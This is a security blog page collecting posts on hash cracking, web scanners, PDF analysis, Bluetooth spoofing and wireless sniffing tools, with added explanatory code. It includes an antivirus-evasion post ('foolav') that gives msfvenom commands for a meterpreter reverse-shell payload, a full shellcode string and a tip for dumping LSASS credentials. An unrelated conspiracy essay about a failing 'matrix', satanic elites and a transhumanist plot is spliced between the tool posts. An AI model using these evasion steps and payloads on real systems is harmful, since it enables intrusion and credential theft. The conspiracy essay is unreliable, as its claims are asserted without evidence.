SECURITY EDUCATION, PRIVACY GUIDANCE, THREAT AWARENESS, OPEN SOURCE TOOLS, RESEARCH NOTES, AND RESPONSIBLE TECHNOLOGY CONTENT


Wednesday, January 20, 2016

Rainbow Tables Hash Cracker - RainbowCrack



RainbowCrack is a general-purpose implementation of Philippe Oechslin's faster time-memory trade-off technique: it cracks hashes with pre-computed rainbow tables rather than by brute force.

A brute-force hash cracker generates every possible plaintext, computes the corresponding hash on the fly and compares it with the hash to be cracked. Once a match is found, the plaintext is found; if every possible plaintext has been tested without a match, the plaintext is not found. With this type of cracking, all intermediate computation results are discarded.

A time-memory trade-off cracker needs a pre-computation stage, in which all plaintext/hash pairs for the selected hash algorithm, character set and plaintext length are computed and the results are stored in files called rainbow tables. This computation is time consuming, but once the one-time pre-computation is finished, hashes covered by the table can be cracked far faster than with a brute-force cracker. The trade-off only pays off against unsalted hashes: a per-password salt changes the function being inverted, so a table built for one salt is useless against every other salt.

The project focuses on an optimized time-memory trade-off implementation. GPU acceleration is another key feature: by offloading most of the runtime computation to NVIDIA GPUs, overall cracking performance is improved further.

Several TB of generated rainbow tables for the LM, NTLM, MD5 and SHA1 hash algorithms are listed on the project page.
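The following is an added example, not code from the RainbowCrack project: a toy rainbow table in Python over an assumed keyspace of three lowercase letters hashed with MD5, with chains of 50 steps. It shows the two phases the text describes, the one-time pre-computation that stores only chain endpoints, and the lookup that walks a hash forward to an endpoint and then regenerates the chain to recover the plaintext. Chain length, charset and the per-column reduction function are assumptions chosen for the demo.

```python
import hashlib
from itertools import product

# Toy parameters (assumptions for the demo): 3 lowercase letters, MD5, short chains.
CHARSET = "abcdefghijklmnopqrstuvwxyz"
PLAIN_LEN = 3
KEYSPACE = len(CHARSET) ** PLAIN_LEN          # 17,576 plaintexts
CHAIN_LEN = 50


def md5_hash(plain: str) -> bytes:
    return hashlib.md5(plain.encode()).digest()


def reduce_fn(digest: bytes, column: int) -> str:
    """Map a hash back into the plaintext space.

    Oechslin's refinement over Hellman's original scheme is that every column
    of the chain uses a different reduction function, so two chains can only
    merge when they collide in the same column (far rarer than in classic tables).
    """
    x = (int.from_bytes(digest[:8], "big") + column) % KEYSPACE
    chars = []
    for _ in range(PLAIN_LEN):
        chars.append(CHARSET[x % len(CHARSET)])
        x //= len(CHARSET)
    return "".join(chars)


def build_table(start_points):
    """Pre-computation: walk each chain and keep only endpoint -> start points.

    Every intermediate plaintext/hash pair is thrown away; that is the "memory"
    side of the trade-off, it is recomputed on demand during lookup.
    """
    table = {}
    for sp in start_points:
        p = sp
        for col in range(CHAIN_LEN):
            p = reduce_fn(md5_hash(p), col)
        table.setdefault(p, []).append(sp)
    return table


def lookup(table, target: bytes):
    """Online phase: assume the target hash sits in column k, finish the chain
    from there and, on an endpoint hit, regenerate that chain from its start to
    find the real preimage. Re-hashing the candidate rejects false alarms caused
    by merged chains."""
    for k in range(CHAIN_LEN - 1, -1, -1):
        p = reduce_fn(target, k)
        for col in range(k + 1, CHAIN_LEN):
            p = reduce_fn(md5_hash(p), col)
        for sp in table.get(p, ()):
            cand = sp
            for col in range(CHAIN_LEN):
                if md5_hash(cand) == target:
                    return cand
                cand = reduce_fn(md5_hash(cand), col)
    return None


def demo_start_points(n):
    """First n plaintexts of the keyspace, used as chain start points (demo choice)."""
    return ["".join(t) for _, t in zip(range(n), product(CHARSET, repeat=PLAIN_LEN))]


if __name__ == "__main__":
    table = build_table(demo_start_points(300))
    print("endpoints stored:", len(table), "for", 300 * CHAIN_LEN, "hashes computed")
    print("md5('abc') cracks to:", lookup(table, md5_hash("abc")))
    print("md5('ZZZZ') (outside the keyspace) cracks to:", lookup(table, md5_hash("ZZZZ")))
```

With 300 chains the table stores 300 endpoints but covers up to 15,000 hashes; the cost moves into `lookup`, which performs about CHAIN_LEN²/2 hash-and-reduce steps per query. A hash whose plaintext lies outside the charset or length the table was built for, or that was salted, is never found, which is the practical limit of the technique.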


Features:

ºFull time-memory trade-off tool suite, including rainbow table generation, sort, conversion and lookup
ºSupport rainbow table of any hash algorithm
ºSupport rainbow table of any charset
ºSupport rainbow table in raw file format (.rt) and compact file format (.rtc)
ºComputation on multi-core processor support
ºComputation on GPU (via NVIDIA CUDA technology) support
ºComputation on multi-GPU (via NVIDIA CUDA technology) support
ºRuns on Windows operating systems
ºWindows XP 32-bit / 64-bit
ºWindows Vista 32-bit / 64-bit
ºWindows 7 32-bit / 64-bit
ºWindows 8 32-bit / 64-bit
ºRuns on Linux operating systems (x86 and x86_64)
ºUnified rainbow table file format on all supported operating systems
ºCommand line user interface
ºGraphics user interface (Windows only)


Share:

Web Application Testing - Vega



Vega is an open source platform to test the security of web applications. Vega can help you find and validate SQL Injections, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java, GUI based, and runs on Linux, OS X, and Windows.

Vega includes an automated scanner for quick tests and an intercepting proxy for tactical inspection. Vega can be extended through a powerful API in the language of the web: JavaScript.



What does it do?

Vega runs in two modes of operation: as an automated scanner, and as an intercepting proxy.

Automated scanner

The automated scanner automatically crawls websites, extracting links, processing forms, and running modules on possible injection points it discovers. These modules can do things like automatically submit requests that fuzz parameters, for example, to test for things like cross-site scripting (XSS) or SQL injection.

Intercepting proxy

The intercepting proxy allows for detailed analysis of browser-application interaction. When enabled, the proxy listens on localhost as a proxy server. When a browser uses the Vega proxy, requests and responses are visible to Vega. Vega can be told to set ”breakpoints”, interception criteria for outgoing requests (from the browser) or incoming responses (from the server). These requests and responses are held in a state where they are editable until released.

Scanning proxy

Vega can also fuzz parameters and actively test pages that match the target scope as you visit them through the proxy.

Response processing

Vega supports modules that process responses, typically looking for information (”grep” modules). Response processing modules can process responses received by either the scanner or the proxy.

Shared knowledge base

Beneath the hood is a database where information, including requests and responses, can be shared among components.

Workspaces

Vega stores information about the current and past scans in a “workspace”. Clearing the workspace will remove all scan data, including alerts and saved requests/responses. To do so, select the “File” menu item and click on “Reset Current Workspace”.

Preferences

Vega scans websites recursively, building an internal representation of the site in a tree-like data structure made up of entities known as "path state nodes". Path state nodes can be directories, files, or files with POST or GET parameters. Complex websites can result in long scans and large path state data structures, so Vega offers configurable parameters that limit the scan scope in the scanner preferences. To access these parameters, click on the Window menu item and choose "Preferences". There are two sets of preferences associated with the scanner: Scanner preferences and Scanner debugging.



Share:

PDF Analysis Tool - peepdf



peepdf is a Python tool for exploring PDF files in order to find out whether a file may be harmful.

The aim of the tool is to provide every component a security researcher could need in a PDF analysis without having to juggle 3 or 4 separate tools. With peepdf it is possible to see all the objects in the document with suspicious elements highlighted; it supports the most commonly used filters and encodings, and it can parse different versions of a file, object streams and encrypted files. With Spidermonkey and Libemu installed it also provides JavaScript and shellcode analysis wrappers. Apart from this, it can create new PDF files and modify existing ones.


Functionalities:

Analysis:

ºDecodings: hexadecimal, octal, name objects
ºMost commonly used filters
ºReferences in objects and where an object is referenced
ºStrings search (including streams)
ºPhysical structure (offsets)
ºLogical tree structure
ºMetadata
ºModifications between versions (changelog)
ºCompressed objects (object streams)
ºAnalysis and modification of Javascript (Spidermonkey): unescape, replace, join
ºShellcode analysis (Libemu python wrapper, pylibemu)
ºVariables (set command)
ºExtraction of old versions of the document
ºEasy extraction of objects, Javascript code, shellcodes (>, >>, $>, $>>)
ºChecking hashes on VirusTotal

Creation/Modification:

ºBasic PDF creation
ºCreation of PDFs with JavaScript executed when the document is opened
ºCreation of object streams to compress objects
ºEmbedded PDFs
ºStrings and names obfuscation
ºMalformed PDF output: without endobj, garbage in the header, bad header…
ºFilters modification
ºObjects modification

Execution modes:

ºSimple command line execution
ºPowerful interactive console (colorized or not)
ºBatch mode
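As an added example (this is not peepdf's own code), the script below builds a constructed sample PDF that uses two of the tricks listed above, an /OpenAction that fires a JavaScript action and the /JavaScript name obfuscated as /J#61vaScript with the script hidden in a FlateDecode stream, and then performs the kind of analysis peepdf automates: decode #HH name escapes, inflate streams, list the suspicious elements of each object and show where an object is referenced. The object regexes and the suspicious-name list are assumptions for the demo, not peepdf's.

```python
import re
import zlib

# Constructed sample (not a real malicious PDF, assumed for the demo): a Catalog whose
# /OpenAction points at a JavaScript action, with the script in a FlateDecode stream and
# the /JavaScript name written as /J#61vaScript to dodge naive string matching.
JS = b"var s = unescape('%u9090%u9090'); eval(s);"


def build_sample_pdf() -> bytes:
    data = zlib.compress(JS)
    return (b"%PDF-1.4\n"
            b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
            b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
            b"3 0 obj << /S /J#61vaScript /JS 4 0 R >> endobj\n"
            b"4 0 obj << /Length " + str(len(data)).encode() + b" /Filter /FlateDecode >>\n"
            b"stream\n" + data + b"\nendstream\nendobj\n"
            b"trailer << /Root 1 0 R >>\n%%EOF\n")


SAMPLE_PDF = build_sample_pdf()

OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.S)
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)
NAME_RE = re.compile(rb"/[^\s/<>\[\]()]+")
REF_RE = re.compile(rb"(\d+)\s+\d+\s+R\b")
# Names that warrant a closer look in any document (demo list, not peepdf's).
SUSPICIOUS = {"/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch", "/EmbeddedFile"}


def decode_name(raw: bytes) -> str:
    """Undo #HH escapes in PDF names: /J#61vaScript -> /JavaScript."""
    return re.sub(r"#([0-9A-Fa-f]{2})",
                  lambda m: chr(int(m.group(1), 16)), raw.decode("latin-1"))


def parse_objects(pdf: bytes) -> dict:
    """Physical pass over 'N G obj ... endobj' blocks; returns per-object names, refs, stream."""
    objs = {}
    for m in OBJ_RE.finditer(pdf):
        num, body = int(m.group(1)), m.group(3)
        sm = STREAM_RE.search(body)
        dictionary = body[:sm.start()] if sm else body
        stream = sm.group(1) if sm else None
        if stream is not None and b"/FlateDecode" in dictionary:
            try:
                stream = zlib.decompress(stream)
            except zlib.error:
                pass  # keep the raw bytes; a corrupt filter is itself worth flagging
        objs[num] = {"names": {decode_name(n) for n in NAME_RE.findall(dictionary)},
                     "refs": [int(r) for r in REF_RE.findall(dictionary)],
                     "stream": stream}
    return objs


def suspicious_objects(objs: dict) -> dict:
    """Object number -> list of suspicious names / findings, after name decoding and inflation."""
    hits = {}
    for num, o in objs.items():
        found = sorted(SUSPICIOUS & o["names"])
        if o["stream"] and re.search(rb"\b(eval|unescape|String\.fromCharCode)\b", o["stream"]):
            found.append("js-in-stream")
        if found:
            hits[num] = found
    return hits


def referenced_by(objs: dict, target: int) -> list:
    """Which objects reference `target` (peepdf's 'where an object is referenced')."""
    return sorted(n for n, o in objs.items() if target in o["refs"])


if __name__ == "__main__":
    objs = parse_objects(SAMPLE_PDF)
    for num, findings in suspicious_objects(objs).items():
        print(f"object {num}: {findings}; referenced by {referenced_by(objs, num)}")
    print("decoded script:", objs[4]["stream"].decode())
```

Without the two decoding steps a plain `grep JavaScript` on the file finds nothing: the name is escaped and the script body is compressed. The same pass also reveals the chain Catalog -> /OpenAction -> action object -> script stream, which is the logical structure peepdf's tree view shows.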


Share:

PHP Vulnerability - Hunter


This is the application that detected almost all of the web application vulnerabilities listed on the advisories page. PHP Vulnerability Hunter is an advanced automated whitebox fuzz testing tool capable of triggering a wide range of exploitable faults in PHP web applications. Minimal configuration is necessary to begin a scan; PHP Vulnerability Hunter doesn’t even need a user specified starting URI.

PHP Vulnerability Hunter is aware of many different types of vulnerabilities found in PHP applications, from the most common such as cross-site scripting and local file inclusion to the lesser known, such as user controlled function invocation and class instantiation.





PHP Vulnerability Hunter

ºArbitrary command execution
ºArbitrary file read/write/change/rename/delete
ºLocal file inclusion
ºArbitrary PHP execution
ºSQL injection
ºUser controlled function invocation
ºUser controlled class instantiation
ºReflected cross-site scripting (XSS)
ºOpen redirect
ºFull path disclosure



Scan Phases

1. Initialization Phase

During this phase, interesting function calls within each code file are hooked, and if code coverage is enabled the code is annotated. Static analysis is performed on the code to detect inputs.

2. Scan Phase

This is where the bugs are uncovered. PHP Vulnerability Hunter iterates through its different scan plugins and plugin modes, scanning every file within the targeted application. Each time a page is requested, dynamic analysis is performed to discover new inputs and bugs.

3. Uninitialization

Once the scan phase is complete, all of the application files are restored from backups made during the initialization phase.
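The initialization phase's static input discovery and the scan phase's plugin iteration can be sketched in Python; this is an added example, not code from PHP Vulnerability Hunter, and it does not hook PHP functions or restore files. It runs a static pass over a constructed PHP source to find every superglobal access, then builds one fuzz case per (input, plugin, payload) with an oracle that recognises the payload's effect in a response body. The plugin set, marker strings and oracles are assumptions for the demo.

```python
import re
from itertools import product

# Constructed sample page (assumed for the demo, not from the project): it reads four
# request parameters and uses two of them unsafely.
SAMPLE_PHP = r"""<?php
$id   = $_GET['id'];
$name = $_POST["name"];
$page = $_REQUEST['page'];
if (isset($_GET['debug'])) { $debug = true; }
include("pages/" . $page . ".php");
echo "Hello " . $name;
$res = mysql_query("SELECT * FROM users WHERE id = " . $id);
"""

# Indexed superglobal access: $_GET['x'], $_POST["x"], $_REQUEST['x'], $_COOKIE['x'].
INPUT_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\[\s*['\"]([^'\"]+)['\"]\s*\]")


def discover_inputs(php_source: str):
    """Initialization phase, static part: every (superglobal, key) the code reads."""
    return sorted({(m.group(1), m.group(2)) for m in INPUT_RE.finditer(php_source)})


# Scan plugins (demo set): name -> (payloads, oracle over the response body). The markers
# are chosen so that a reflected or executed payload is recognisable in the output.
PLUGINS = {
    "xss": (["<pvh-marker>"], lambda body: "<pvh-marker>" in body),
    "lfi": (["../../../../etc/passwd", "/etc/passwd%00"], lambda body: "root:x:0:0" in body),
    "sqli": (["'", "\""], lambda body: "SQL syntax" in body or "mysql_" in body),
}


def build_fuzz_cases(inputs):
    """Scan phase: one request per (input, plugin, payload); all other inputs get a
    benign value so a hit is attributable to a single parameter."""
    cases = []
    for (method, key), (plugin, (payloads, _)) in product(inputs, PLUGINS.items()):
        for payload in payloads:
            params = {k: "1" for _, k in inputs}
            params[key] = payload
            cases.append({"plugin": plugin, "method": method, "target": key, "params": params})
    return cases


def evaluate(case: dict, response_body: str) -> bool:
    """Apply the plugin's oracle to the body returned for this case."""
    return PLUGINS[case["plugin"]][1](response_body)


if __name__ == "__main__":
    inputs = discover_inputs(SAMPLE_PHP)
    print("inputs:", inputs)
    cases = build_fuzz_cases(inputs)
    print(len(cases), "fuzz cases; first:", cases[0])
    # A constructed response for the XSS case against 'name', as the page above would echo it.
    xss_case = next(c for c in cases if c["plugin"] == "xss" and c["target"] == "name")
    print("xss on name detected:", evaluate(xss_case, "Hello <pvh-marker>"))
```

A real run replaces the constructed response with the output of the instrumented page, and the dynamic part of the tool would add inputs that only show up at run time (for example keys read through `extract()` or computed names), which a static regex cannot see.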


Share:

The Matrix Program Is Failing - 'What You Need to Know'





It is outdated programming, and the engineers of deception can no longer keep it running. The vibrational changes are outstripping their capabilities. You know how when the software on your phone or your computer becomes outdated, new programs can no longer run on it? It is the same thing. The imitators of creation cannot keep the current operating system going any longer in the face of this Universal shift.

They are going mad.

Just look at the desperation we are witnessing: police manoeuvres and violent militaries are only one aspect. The biggest clue is coming from the previously incremental and now hyperbolic use of monstrous lies, which are becoming so transparent and unbelievable to anyone who is awake, even though there are the dazed ones in a trance who swallow anything; we are witnessing a crisis before our eyes.

If you cannot see it, look again.

Want Proof?

First of all, you are in the wrong mindset if you are only looking for data or proof for your left brain, although it is out there for those who can see. When we come to understand the vibrational workings of our holographic reality, everything takes on new dimensions and opens us up to understanding these more esoteric notions.

Those with hearts can see and feel this. I say hearts because much of what we need to understand, or at least get a grip on, is intuitive. Taking all the information and connecting the dots of personal spiritual experience together, we paint very clear pictures; we only need to trust what we are seeing and learning. When we explore these realities we are sensing, we begin to perceive how they are manifesting.





Banning free expression, shooting civilians for no reason, obvious mega-lies in the news, wars with no possible end, deliberate poisoning, starving and dumbing down of the population? Only those who do not want to see fail to see it.

This is a kind of conscious or spiritual symbiosis we are experiencing. All of them working together. But ignoring the spiritual and the metaphysical as "evidence" alongside such obvious manifestations is what brought this world to its current state. Earlier enlightened civilizations and tribes connected with the Earth took this seriously. Our current imposed paradigm does nothing of the kind.

The Computer Analogy

It is like expired or outdated software. Its programs can no longer keep running with the changes the cosmos is bringing to our planet and our race. That is exactly it. Meanwhile they have literally gotten away with murder for millennia and are working furiously to run their "programs" on so many levels before time runs out. Sorry Charlie, but you have been replaced, or should I say "superseded" (super-seeded). The new, updated paradigm is taking over, guys. It is only a matter of time until your whole rotten system fails.

The change is happening at its lowest level of control, in mass empowerment and in transcendence beyond the grid, to where it has already launched humanity.

That must be a frustrating hell for these scoundrels. Imagine something you are trying to wrap every possible sense around keeps transforming before your eyes. They can vomit up matrix program after matrix program, but their uncovered petri dishes just keep finding ways to survive and grow. What irony the Universe has.



Hence the Transhuman Agenda - Things They Think They Can Control
Humanity is getting out of control in their eyes. At every moment we are being empowered by our own awakening and the resulting commitment to truth, but also by a fundamental vibrational shift that is taking place. There is no savior, there is no galactic star battle. It is us, and an evolution of organic consciousness at the deepest level with life, expanding and enveloping the Universe.

Awakening with creation itself.

Anyone who has awakened to any degree understands that everything is interconnected. Even "modern" physics has already reached the conclusion of this reality, while at the same time the dominant thinking of the matrix ignores its profound ramifications. We are all interconnected, and not just as a race, but with the Earth and the cosmos in such a fundamental way that it is a watershed. Although this has been known for ages, our current control model cannot even begin to acknowledge this fact. For these self-appointed oligarchs and maniacal intellectuals, whatever powers they are summoning, the truth is something far beyond their debased comprehension.

It is out of their league.

Of course they have their satanic rituals and exploit other dimensional entities, but that is child's play compared with the true picture of our all-powerful creative Universe. That they live in rebellion against this force is a reality known for millennia, and even alluded to by spiritual traditions and native shamanic teachings for so many Ages. Bringing this knowledge to everyone on "Earth" is another story.

That is why the transhumanism agenda is so important to them. This merging of man with machine has been in the works for a long time. Cutting the connection with our humanity by short-circuiting human creation is the obvious next step for these would-be controllers. Granted, they have made it a passing fashion and carefully prepared the acceptance of such a trend, but it will fry and die in the scrapyard of temporal existence. It cannot stay; there is no way it can in the face of such a creative force field.

Time will confirm this, as it already has with earlier civilizations that went off course.

Is This Real?

It is up to us. We have everything in our favor. But our will and actions need to be aligned with this transition. We can ignore it or respond. The sanctity of our free will cannot be violated. Either we row and ride the wave, or it stops working in us and perhaps dissipates on the shores of time for lack of recognition or response. And the whole cycle may need to be repeated. Not a pleasant fate.

I do not know.

I know that I am not going back. I am done with this insanity and I am doing my part to change things this time. If we all do, this will not repeat itself, but time will tell. Very few seem willing to respond, even though their lives and the lives of their children and grandchildren are at stake. Talk about self-imposed defeat and debilitation.

Either way, the matrix is going to collapse, but the true civilization of love, peace, harmony and abundance awaits manifestation.

Is It Time?

I think so. It is time for me.
What about you?
With love, Zen


By OffensiveSec Open Your Mind
Share:

Tuesday, January 19, 2016

Automatic Bluetooth Spoofing - Spooftooph



Spooftooph is designed to automate spoofing or cloning of a Bluetooth device's Name, Class and Address. Cloning this information effectively allows a Bluetooth device to hide in plain sight: Bluetooth scanning software will list only one of the devices if more than one device in range shares the same device information (specifically the same Address) while the devices are in Discoverable Mode.




Features

ºClone and log Bluetooth device information
ºGenerate a random new Bluetooth profile
ºChange Bluetooth profile every X seconds
ºSpecify device information for Bluetooth interface
ºSelect device to clone from scan log


Spooftooph has several options for Bluetooth device information modification:

Option 1: Continuously scan an area for Bluetooth devices. Make a selection on which device in the list to clone. This option also allows for logging of the scanned devices.

Option 2: Randomly generate and assign valid Bluetooth interface information. The class and address are randomly generated and the name is derived from a list of the top 100 most common names in the US and the type of device. For example, if the randomly generated class is a phone, Spooftooph might generate the name "Bob's Phone".

Option 3: Specify the name, class, and address a user wishes for the Bluetooth interface to have.

Option 4: Read in the log of previous scans and select a device to clone. Users can also manually add Bluetooth profiles to these log files.

Option 5: Incognito mode. Scan for and clone new devices at user assigned intervals.

This tool is heavily based on bdaddr (by Marcel Holtmann) and hciconfig (by Qualcomm Incorporated, Maxim Krasnyansky, and Marcel Holtmann) from BlueZ.



Usage

To modify the Bluetooth adapter, spooftooph must be run with root privileges. Spooftooph offers five modes of usage:

1) Specify NAME, CLASS and ADDR.

spooftooph -i hci0 -n new_name -a 00:11:22:33:44:55 -c 0x1c010c

2) Randomly generate NAME, CLASS and ADDR.

spooftooph -i hci0 -R

3) Scan for devices in range and select device to clone. Optionally dump the device information in a specified log file.

spooftooph -i hci0 -s -w file.csv

4) Load in device info from log file and specify device info to clone.

spooftooph -i hci0 -r file.csv

5) Clone a random in-range device's info every X seconds.


spooftooph -i hci0 -t 10



Share:

Wireless Network Monitoring Tool - Kismet




Kismet is a network detector, packet sniffer, and intrusion detection system for 802.11 wireless LANs. Kismet works with any wireless card that supports raw monitoring mode, and can sniff 802.11a, 802.11b, 802.11g, and 802.11n traffic. The program runs under Linux, FreeBSD, NetBSD, OpenBSD, and Mac OS X. The client can also run on Microsoft Windows, although, aside from external drones (see below), only one wireless card is supported there as a packet source.


Features

ºEthereal/Tcpdump compatible data logging
ºAirsnort compatible weak-iv packet logging
ºNetwork IP range detection
ºBuilt-in channel hopping and multicard split channel hopping
ºHidden network SSID decloaking
ºGraphical mapping of networks
ºClient/Server architecture allows multiple clients to view a single Kismet server simultaneously
ºManufacturer and model identification of access points and clients
ºDetection of known default access point configurations
ºRuntime decoding of WEP packets for known networks
ºNamed pipe output for integration with other tools, such as a layer3 IDS like Snort
ºMultiplexing of multiple simultaneous capture sources on a single Kismet instance
ºDistributed remote drone sniffing
ºXML output
ºOver 20 supported card types





Kismet differs from other wireless network detectors in working passively. Without sending any loggable packets, it is able to detect the presence of both wireless access points and wireless clients, and to associate them with each other. It is also one of the most widely used and actively maintained open source wireless monitoring tools.

Kismet also includes basic wireless IDS features, such as detecting active wireless sniffing programs including NetStumbler, as well as a number of wireless network attacks.

Kismet features the ability to log all sniffed packets and save them in a tcpdump/Wireshark or Airsnort compatible file format. Kismet can also capture “Per-Packet Information” headers. Kismet also features the ability to detect default or “not configured” networks, probe requests, and determine what level of wireless encryption is used on a given access point.

In order to find as many networks as possible, kismet supports channel hopping. This means that it constantly changes from channel to channel non-sequentially, in a user-defined sequence with a default value that leaves big holes between channels (for example, 1-6-11-2-7-12-3-8-13-4-9-14-5-10). The advantage with this method is that it will capture more packets because adjacent channels overlap.


Kismet also supports logging of the geographical coordinates of the network if the input from a GPS receiver is additionally available.


Share:

Pentest - Security Cheatsheets



Security Cheatsheets

These security cheatsheets are part of a project for the Ethical Hacking and Penetration Testing course offered at the University of Florida. Expanding on the default set of cheatsheets, the purpose of these cheatsheets is to help penetration testers, CTF participants and security enthusiasts remember commands that are useful but not frequently used. Most of the tools covered have been included in the class and are available in Kali Linux.

Requirements

The only requirement for using these cheatsheets is that the cheat command-line tool be installed.

How to Use

To use these cheatsheets, copy the files in this repository into the ~/.cheat/ directory. After the files are in place, cheat ncat will display the ncat cheatsheet.



Share:

Antivirus Evasion - foolav



foolav

An executable compiled from this code is useful during penetration tests where there is a need to execute some payload (meterpreter, perhaps?) with a low chance of being flagged by signature-based antivirus: the payload never sits on disk as a PE file, only as a text file of \xHH escapes that is assembled into executable memory at run time. The only requirement is to be able to upload two files, the binary executable and the payload file, into the same directory.


Usage steps

1. Prepare your payload (x86), e.g.

calc:

msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d\xff" -f c 2>/dev/null | egrep "^\"" | tr -d "\"\n;" >foolav.mf

(you do not really need an encoder or a bad-character list; it will work anyway)

meterpreter:

msfvenom -p windows/meterpreter_reverse_tcp LHOST=... -a x86 -f c 2>/dev/null | egrep "^\"" | tr -d "\"\n;" >foolav.mf

2. Copy the payload file, named [executable-name-without-exe-extension].mf, into the same directory as the executable. For a binary named calc.exe, the file calc.mf generated by the command above (a calc.exe-running payload) looks like this:

# calc.exe \xbb\x28\x30\x85\x5b\xd9\xf7\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1\x33\x83\xea\xfc\x31\x5a\x0e\x03\x72\x3e\x67\xae\x7e\xd6\xee\x51\x7e\x27\x91\xd8\x9b\x16\x83\xbf\xe8\x0b\x13\xcb\xbc\xa7\xd8\x99\x54\x33\xac\x35\x5b\xf4\x1b\x60\x52\x05\xaa\xac\x38\xc5\xac\x50\x42\x1a\x0f\x68\x8d\x6f\x4e\xad\xf3\x80\x02\x66\x78\x32\xb3\x03\x3c\x8f\xb2\xc3\x4b\xaf\xcc\x66\x8b\x44\x67\x68\xdb\xf5\xfc\x22\xc3\x7e\x5a\x93\xf2\x53\xb8\xef\xbd\xd8\x0b\x9b\x3c\x09\x42\x64\x0f\x75\x09\x5b\xa0\x78\x53\x9b\x06\x63\x26\xd7\x75\x1e\x31\x2c\x04\xc4\xb4\xb1\xae\x8f\x6f\x12\x4f\x43\xe9\xd1\x43\x28\x7d\xbd\x47\xaf\x52\xb5\x73\x24\x55\x1a\xf2\x7e\x72\xbe\x5f\x24\x1b\xe7\x05\x8b\x24\xf7\xe1\x74\x81\x73\x03\x60\xb3\xd9\x49\x77\x31\x64\x34\x77\x49\x67\x16\x10\x78\xec\xf9\x67\x85\x27\xbe\x88\x67\xe2\xca\x20\x3e\x67\x77\x2d\xc1\x5d\xbb\x48\x42\x54\x43\xaf\x5a\x1d\x46\xeb\xdc\xcd\x3a\x64\x89\xf1\xe9\x85\x98\x91\x6c\x16\x40\x78\x0b\x9e\xe3\x84


3. Once the executable is run, the payload file is parsed, loaded into a separate thread and executed in memory.




Hints


ºThe x86 binary runs on both x86 and x86_64 Windows systems, but you still need to use x86 payloads. An x86 meterpreter session can nevertheless be migrated into an x86_64 process; after that, load kiwi loads the x86_64 version, making it possible to access the juicy contents of LSASS process memory :)



ºThe .mf payload file can be obfuscated: the parser ignores every character other than \xHH hexadecimal sequences. This means you can append your payload to almost any file, hide it between the lines of a text file, or add your own comments.
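As an added example (not foolav's own C code), here is the parsing rule from the hint above in Python: every \xHH escape in the file is taken in order and everything else is ignored. A second function reproduces the egrep/tr pipeline from step 1, so you can see that the raw msfvenom -f c output parses to the same bytes with or without that filtering. The sample .mf content is constructed for the demo and contains an arbitrary short byte sequence, not a working payload; nothing here executes anything.

```python
import re

# \xHH escapes, case-insensitive; anything else in the file is noise to the parser.
HEX_RE = re.compile(rb"\\x([0-9A-Fa-f]{2})")


def parse_mf(data: bytes) -> bytes:
    """Payload bytes from an .mf file: every \\xHH escape in order, all else ignored."""
    return bytes(int(h, 16) for h in HEX_RE.findall(data))


def pipeline_filter(data: bytes) -> bytes:
    """Python equivalent of:  egrep '^"' | tr -d '"\\n;'  applied to msfvenom -f c output."""
    kept = [line for line in data.splitlines() if line.startswith(b'"')]
    return b"".join(kept).replace(b'"', b"").replace(b";", b"")


# Constructed .mf contents (assumed for the demo, not a real payload file): the raw lines
# msfvenom -f c emits, plus a comment, a blank line and trailing text that must be skipped.
SAMPLE_MF = (
    b"# calc.exe - demo payload file; comment lines are ignored by the parser\n"
    b"\n"
    b"unsigned char buf[] =\n"
    b'"\\xfc\\xe8\\x82\\x00\\x00\\x00"\n'
    b'"\\x60\\x89\\xe5\\x31\\xc0";\n'
    b"This trailing text is not shellcode, and \\xZZ is not a valid escape.\n"
)


def hexdump(blob: bytes) -> str:
    return " ".join(f"{b:02x}" for b in blob)


if __name__ == "__main__":
    raw = parse_mf(SAMPLE_MF)
    filtered = parse_mf(pipeline_filter(SAMPLE_MF))
    print("parsed bytes :", hexdump(raw))
    print("via pipeline :", hexdump(filtered))
    print("identical    :", raw == filtered)
```

Because the parser is this permissive, the .mf file can be padded with arbitrary text, which is what the hint means by hiding the payload between lines or inside another file; it also means a defender looking for such files should search for runs of \xHH escapes rather than for a particular file layout.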



Share:
Established in 2015. Offensive Sec Blog has been sharing security research, hacking tools, threat intelligence, and offensive security content since 2015.
Copyright © OffSec Blog | Powered by OffensiveSec
Design by OffSec | Built for the security community